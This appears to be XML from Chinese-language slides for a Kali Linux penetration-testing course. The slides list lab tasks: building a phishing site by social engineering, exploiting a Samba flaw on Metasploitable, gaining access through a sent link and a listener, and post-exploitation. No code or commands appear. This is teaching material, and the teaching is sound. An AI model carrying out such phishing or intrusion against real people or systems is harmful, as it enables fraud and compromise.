              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用社会工程学制作一个钓鱼网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EEDFE7C-E9CF-E70A-EF33-148D55B82397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="169863" y="4689151"/>
            <a:ext cx="11007384" cy="3316742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{277144D6-3432-5E40-49E6-8010EC4DF021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312680" y="5269269"/>
            <a:ext cx="11007384" cy="4055406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>分别通过发送一个网址链接和监听软件实现渗透攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 5.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用扫描目标主机上的一种漏洞实现后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F5F9684-2DED-20DA-4FA9-C530F1BFDB29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490081" y="4836100"/>
            <a:ext cx="11892194" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>渗透攻击—利用Samba服务漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23215783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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977182" y="2796830"/>
            <a:ext cx="4237058" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" i="1" dirty="0">
                <a:ln w="10541" cmpd="sng">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>谢     谢！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1514391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矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{555A1941-6B5A-D88B-BEDE-9FC7B7CC19CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2579"/>
            <a:ext cx="12192000" cy="6856016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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Clr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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Clr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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Clr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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defTabSz="1219200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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defTabSz="1219200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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defTabSz="1219200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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defTabSz="1219200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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1218590" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AF3886F-4400-B322-5AEA-C73D12E325B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="17453" y="5490287"/>
            <a:ext cx="12188827" cy="1367713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="595959"/>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Clr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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Clr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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Clr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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defTabSz="1219200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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defTabSz="1219200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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defTabSz="1219200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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defTabSz="1219200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="21B6BB"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>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1218590" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="C:\Users\王佩丰\Desktop\未标题-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ABEA037-A048-E6C9-3B93-9237B28012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587"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6347" y="-12261"/>
            <a:ext cx="12214213" cy="5501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0" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99A7934-EE2E-5C05-E0FA-B994F9D7917D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2398954" y="2259801"/>
            <a:ext cx="10651340" cy="2338397"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5397" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5397" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>渗透测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5397" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C0C0C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
